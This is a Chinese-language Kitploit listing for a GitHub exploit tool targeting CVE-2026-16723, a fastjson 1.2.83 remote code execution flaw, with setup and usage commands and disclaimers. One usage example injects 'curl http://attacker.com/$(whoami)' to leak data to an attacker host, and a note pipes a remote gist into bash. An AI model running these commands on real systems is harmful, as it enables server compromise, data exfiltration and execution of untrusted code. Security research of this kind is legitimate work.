Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-16723 — CVE-2026-16723 | Kitploit
工具/GitHubGitHub/horkimhab/cve-2026-16723
学习与教育
GitHubhorkimhab/cve-2026-16723

CVE-2026-16723

CVE-2026-16723

查看仓库网站
1125天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-16723

捐赠

请通过 PayPal 或扫描下方二维码来支持本项目的维护。

paypal

捐赠二维码

⚡ 简单用法

请仅在安全且已获授权的环境中使用本项目,例如:

  • 本地虚拟机
  • Docker 容器
  • 隔离的实验室环境
  • 已获授权的渗透测试环境

示例设置:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723

# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

示例用法:

root@kitploit:~
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse

# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"

# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000

# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure

# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080

# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50

# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet

注意:

  • 从其他项目克隆时,你必须运行 curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y 来清除嵌套目录中的 .git
  • 例如:cve-2025-46822.sh、cve-2025-46822-lab.sh 等

致谢或参考

  • https://fearsoff.org/research/fastjson-1-2-83-rce
  • https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
  • https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch

📚 教育性安全研究仓库

一个用于在受控环境中学习、测试和研究网络安全概念的仓库。


⚠️ 安全与法律免责声明

目的

本仓库仅用于教育及已获授权的安全研究。

它旨在帮助用户了解:

  • 安全漏洞
  • 沙箱与隔离概念
  • 安全编码与防御实践

仅限授权使用

请仅在您拥有许可的环境中使用本仓库,例如:

  • 个人实验室或虚拟机
  • Docker 或隔离环境
  • 已获授权的渗透测试
  • 网络安全培训或学术研究

严禁未经授权或非法使用。


免责条款

作者和贡献者不承担因本项目造成的任何损害、滥用、法律问题或损失的责任。

使用本仓库即表示您同意:

  • 您对自己的行为负责
  • 您将合法且合乎道德地使用它
  • 本项目不提供任何担保

道德使用

本项目旨在用于:

  • 防御性安全研究
  • 网络安全教育
  • 漏洞意识提升
  • 安全的系统与软件研究

请遵循负责任披露实践,并遵守所有适用法律。


联系方式

如需进行负责任披露或合作,请通过 GitHub 联系仓库维护者。

下载工具